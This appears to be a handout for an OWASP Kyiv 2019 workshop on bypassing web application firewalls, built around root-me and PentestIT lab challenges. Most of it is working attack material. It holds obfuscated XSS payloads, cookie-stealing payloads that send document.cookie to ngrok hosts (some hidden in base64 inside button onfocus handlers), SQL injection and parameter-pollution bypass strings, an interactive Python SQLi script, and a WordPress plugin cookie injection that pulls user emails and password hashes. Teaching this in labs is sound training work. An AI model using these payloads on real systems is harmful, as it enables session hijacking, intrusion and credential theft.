Requirements:
- Kali Linux
- Basic knowleges about SQL injection and XSS attacks
- To have registration here:
- https://lab.pentestit.ru/
- https://www.root-me.org
- To have a good mood ;)

Registration on lab.pentestit.ru steps:
1) create an account here : https://lab.pentestit.ru/signup
2) Login from Kali Linux to the site -> navigate to https://lab.pentestit.ru/how-to-connect
3) Download openvpn config file and credentials
4) Create a folder /root/TestLab/ and copy vpn config file and credentials to this folder
5) start openvpn

Agenda:
Intro - few words about WAF, highlevel summary info about different WAF bypass cases
1st Part:
- Browser console practice
- Filter bypass in stored XSS (https://www.root-me.org/en/Challenges/Web-Client/XSS-Stored-filter-bypass)

2nd Part:
- Few words about SQL injection techniques
- Little SQL terminal practice
- Filter bypass in Union Based SQL Injection (https://www.root-me.org/en/Challenges/Web-Server/SQL-injection-filter-bypass)

3rd Part (WAF bypass example from TestLab 12 by PentestIT):
- Little intro and threat modeling (Discovering vulnerability during information gathering )
- Vulnerability confirmation
- Code review of vulnerable wp plugin
- Little practice in PHP interactive shell (debugging and discovering WAF bypass techique)
- WAF bypass in SQL Injection (2 cases)

New public link to channel


@owasp_kiev_waf_bypass

ALTERNATIVES:

alert('OWASP Ukraine')

promt('OWASP Ukraine')
confirm('OWASP Ukraine')
alert(/ OWASP Ukraine/.source)

console.log("OWASP Ukraine")
console.error("OWASP Ukraine")
console.trace("OWASP Ukraine")

window[/al/.source+/ert/.source](/OW/.source+/ASP/.source)
eval(["al","ert"].join``)(["O","W","A","S","P"].join``)
\u0061\u006c\u0065\u0072\u0074`\x4f\x57\x41\x53\x50\x20\x55\x6b\x72\x61\x69\x6e\x65`

EVAL
eval('ale'+'rt(0)');
(eval)(alert`OWASP`)
Function("ale"+"rt(OWASP)")();
new Function`al\ert\`OWASP\``;
setTimeout('ale'+'rt(OWASP)');
setInterval('ale'+'rt(OWASP)');
Set.constructor('ale'+'rt(OWASP)')();
Set.constructor`al\x65rt\x28/OWASP/.source\x29```;
Set.constructor`al\x65rt\x28\x22OWASP\x20WorkShop\x22\x29```


['alert`OWASP`'].map(eval)
['alert`OWASP`'].find(eval)
['alert`OWASP`'].every(eval)
['alert`OWASP`'].filter(eval)
['alert`OWASP`'].findIndex(eval)
['alert`OWASP`'].forEach(eval);
[\u0061\u006c\u0065\u0072\u0074`\x4f\x57\x41\x53\x50\x20\x55\x6b\x72\x61\x69\x6e\x65`].forEach(setInterval);
[\x61\x6c\x65\x72\x74\x28\x22\x4f\x57\x41\x53\x50\x22\x29].map(eval)


[\u0061\u006c\u0065\u0072\u0074`\x4f\x57\x41\x53\x50 \x4b\x69\x65\x76 \x57\x69\x6e\x74\x65\x72 \x4d\x65\x65\x74\x75\x70 \x32\x30\x31\x39`].forEach`setInterval`;




[\x61\x6c\x65\x72\x74\x28\x22\x57\x65\x6c\x63\x6f\x6d\x65\x22\x29,\x61\x6c\x65\x72\x74\x28\x22\x54\x6f\x20\x4f\x57\x41\x53\x50\x22\x29,\x61\x6c\x65\x72\x74\x28\x22\x57\x69\x6e\x74\x65\x72\x20\x4d\x65\x65\x74\x75\x70\x20\x32\x30\x31\x39\x22\x29].map(setTimeout)

document.location.href="https://www.owasp.org/index.php/Ukraine"
window['location']['href']="https://www.owasp.org/index.php/Ukraine"
window.location.assign("https://www.owasp.org/index.php/Ukraine")


constructor.constructor("aler"+"t(OWASP)")();
constructor.constructor.constructor("aler"+"t(OWASP)")();
[].filter.constructor('ale'+'rt(OWASP)')();
[][filter][\x63\x6f\x6e\x73\x74\x72\x75\x63\x74\x6f\x72]('\x61\x6c\x65'+'rt(OWASP)')();

Common ENCODING
base64:
btoa('text_to_encode')
atob('text_to_decode')
(eval)(atob`YWxlcnRgV2ludGVyIFdBRiBXb3JrU2hvcGA=`)
(eval)(atob(/YWxlcnRgV2VsY29tZSB0byBPV0FTUCBVa3JhaW5lIFdvcmtTaG9wICBg/.source))


String.fromCharCode(charcode_here)

eval(String.fromharCode(97, 108, 101, 114, 116, 40, 39, 87, 101, 108, 99, 111, 109, 101, 32, 116, 111, 32, 79, 87, 65, 83, 80, 32, 85, 107, 114, 97, 105, 110, 101, 32, 87, 111, 114, 107, 83, 104, 111, 112, 39, 41))


\u0065val(String.from\u0043har\u0043ode(97, 108, 101, 114, 116, 40, 39, 87, 101, 108, 99, 111, 109, 101, 32, 116, 111, 32, 79, 87, 65, 83, 80, 32, 87, 105, 110, 116, 101, 114, 32, 77, 101, 101, 116, 117, 112, 32, 87, 111, 114, 107, 83, 104, 111, 112, 39, 41))


var _0xd3c0d3 = ["Welcome to WorkShop","document","alert"]
with(_0xd3c0d3[1])eval(_0xd3c0d3[2])(_0xd3c0d3[0])
with(document)alert("Welcome to WorkShop")


SENDING value to external resouce:

innerHTML="HTML TEG With SRC Attribute"
document.write("THE SAME")
var x = document.createElement('HTML TAG with SRC Att")
x.src="external resource"
document.body.appendChild(x)

document.body.appendChild((new Image()).src='http://1b150cb3.ngrok.io/?HelloOWASP)

https://www.root-me.org/en/Challenges/Web-Client/XSS-Stored-filter-bypass

http://challenge01.root-me.org/web-client/ch21/

XSS attack plan:
discover HTML injection
discover HTML5 whitelisted element
confirm XSS
Prepare Payload
Obfuscate or encode payload
Login via admin cookie



<button autofocus onfocus = [].filter.constructor(atob(/YWxlcnQoZG9jdW1lbnQuY29va2llKQ==/.source))()></button>


Testing PARAMETERS


url=http://c532ef6d.ngrok.io
var x = new Image();x.src='http://c532ef6d.ngrok.io/?cookie='+escape(document.cookie)


<form><button onfocus=(eval)(atob(/KG5ldyBJbWFnZSgpKS5zcmM9J2h0dHA6Ly9jYmMwM2I0OC5uZ3Jvay5pby9jb29raWU9Jytlc2NhcGUoZG9jdW1lbnQuY29va2llKQ==/.source)); autofocus >

<button autofocus onfocus = \u0061lert(0) ></button>







<button autofocus onfocus = [].filter.constructor(atob(/dmFyIHggPSBuZXcgSW1hZ2UoKTt4LnNyYz0naHR0cDovL2M1MzJlZjZkLm5ncm9rLmlvLz9jb29raWU9Jytlc2NhcGUoZG9jdW1lbnQuY29va2llKQ==/.source))()></button>

Tools:
https://github.com/d3vilbug/HackBar

http://www.waraxe.us/sql-char-encoder.html

Before Begin:

Stacked Query:
select 1;select 2;insert into user values(1337,'Hacker','Password');

Union Based SQLi
Select 111,222 union select 333,444 union select 777,888;


Error Based:
SubSelect :
and (select 1 from (Select count(*),Concat((<Your Query here to return single row>),0x3a,floor(rand (0) *2))y from information_schema.tables group by y) x)
select 111 and (select 1 from (Select count(*),Concat((version()),0x3a,floor(rand (0) *2))y from information_schema.tables group by y) x);

UpdateXML and ExtractValue

and updatexml(null,concat(0x3a,(OUR QUERY HERE)),null)
and updatexml(null,concat(0x3a,(0x0a,(select database()))),null)

and extractvalue(0x0a,concat(0x0a,(OUR QUERY HERE)))
and extractvalue(0x0a,concat(0x0a,(select database())))



WAF bypass techniques by OWASP

https://www.owasp.org/index.php/SQL_Injection_Bypassing_WAF
Bypassing WAF: SQL Injection - Normalization Method
/?id=1/*union*/union/*select*/select+1,2,3/*
index.php?id=1/*uni X on*/union/*sel X ect*/select+1,2,3/*
'Using HTTP Parameter Pollution (HPP)'
/?id=1//union/*&id=*/select/*&id=*/pwd/*&id=*/from/*&id=*/users
id=1//union/*,*/select/*,*/pwd/*,*/from/*,*/users
ByPassing WAF: SQL Injection – HPF
Query("select * from table where a=".$_GET['a']." and b=".$_GET['b']);
Query("select * from table where a=".$_GET['a']." and b=".$_GET['b']." limit".$_GET['c']);

/?a=1+union/*&b=*/select+1,2
/?a=1+union/*&b=*/select+1,pass/*&c=*/from+users--
select * from table where a=1 union/* and b=*/select 1,2
select * from table where a=1 union/* and b=*/select 1,pass/* limit */from users--



SQLInjection

boolean Blind:
and ascii(substring(database() 1, 1)) = 115 -- -











































SELECT ALTERNATIVE:
set @x=0x73656C65637420636F6E63617428646174616261736528292C307832302C76657273696F6E28292C307830612C2257656C636F6D6520546F204F5741535020556B7261696E652229;
prepare inj from @x;execute inj;

WHITESPACES:
• %0c = form feed, new page
• %09 = horizontal tab
• %0d = carriage return
• %0a = line feed, new line
• %0b
• %a0

SEL\nECT user FR\tOM mys\tql.user;



Coma BYPASS:

select 111,222 union select * from (select ‘x’)a join(select ‘y’)b;

https://www.root-me.org/en/Challenges/Web-Server/SQL-injection-filter-bypass
http://challenge01.root-me.org/web-serveur/ch30/


2-1 detection
%a0 whitespace
count columns from source
enumerate operators
DETERMINE UPPERCASE WHITELISTING OPERATORS
find vuln column
extract admin password

id=0%a0UNION%a0SELECT%a0*%a0FROM%a0(SELECT%a01)a%a0JOIN%a0(SELECT%a02)b%a0JOIN%a0(SELECT%a03)c%a0JOIN%a0(SELECT%a04)d

&id=0%a0UNION%a0SELECT%a0*%a0FROM%a0(SELECT%a01)a%a0JOIN%a0(SELECT%a02)b%a0JOIN%a0(SELECT%a03)c%a0JOIN%a0(SELECT%a0(SELECT%a0pass%a0From%a0membres%a0LIMIT%a01))d





import requests
import urllib
import sys

#OWASP KIEV WINTER MEETUP 2019
#
#(c) Mister_Bert0ni
#
#Payload = UNION SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c JOIN (SELECT 4)d

"""
SOURCE CODE:
<!--
// CREATE TABLE IF NOT EXISTS membres (
// id int(1) NOT NULL AUTO_INCREMENT,
// username VARCHAR(5) NOT NULL,
// pass VARCHAR(20) NOT NULL,
// email VARCHAR( 50 ) NOT NULL,
// PRIMARY KEY (id)
// ) ENGINE=MyISAM DEFAULT CHARSET=latin1 AUTO_INCREMENT=2 ;
-->
"""

url = "http://challenge01.root-me.org/web-serveur/ch30/?action=membres&id=-1%A0"
print "For stop stript enter 'exit'\n"
while True:
payload = raw_input("SQL:> ").replace(" ","%A0")
if payload == 'exit':
break
sys.exit()
else:
try:
print payload
r = requests.get(url+payload)
print r.url
print r.text.split('-->')[1].split('</body>')[0].replace('<br />',' ')
except:
print "Connection error..."

view sourse : http://site.test.lab/

href='http://site.test.lab/wp-content/plugins/wp-survey-and-poll/templates/assets/css/wp_sap.css?ver=4.9.8'

searchsploit -w WordPress Plugin Survey

https://www.exploit-db.com/exploits/45411

https://www.exploit-db.com/apps/58cad03b651fb89471cf372b0f201278-wp-survey-and-poll.zip

else {
if ( isset( $_COOKIE[ 'wp_sap' ] ) ) {
$survey_viewed = json_decode( stripslashes( $_COOKIE[ 'wp_sap' ] ) );
}
if ( ! empty( $survey_viewed ) ) {
$sv = implode( $survey_viewed );




print implode(["Wellcome ", " to ", "OWASP Meetup"]);
var_dump($cookie);
print $cookie[0];







$cookie = json_decode('["\u004f\u0057\u0041\u0053\u0050\u0020\u004d\u0045\u0045\u0054\u0055\u0050"]');


wp_sap=["OWASP')) \u0055nion \u0053elect null,null,null,null,null,null,null,null,null,\u0063oncat(us\u0065r_email,0x203a3a20,us\u0065r_pass),null from wp_us\u0065rs #"]

wp_sap=["OWASP')) uni","on sel","ect null,null,null,null,null,null,null,null,null,CAST(name as CHAR),null from token #"]

information about owasp security events can be found here:


@OWASP_UA

Всі доповіді OWASP Kyiv Winter 2019 згодом з’являться на нашому каналі в YouTube: https://www.youtube.com/c/owaspKyiv. А зараз ви можете підписатися на нього та ввімкнути 🔔, щоб не пропустити жодного відео.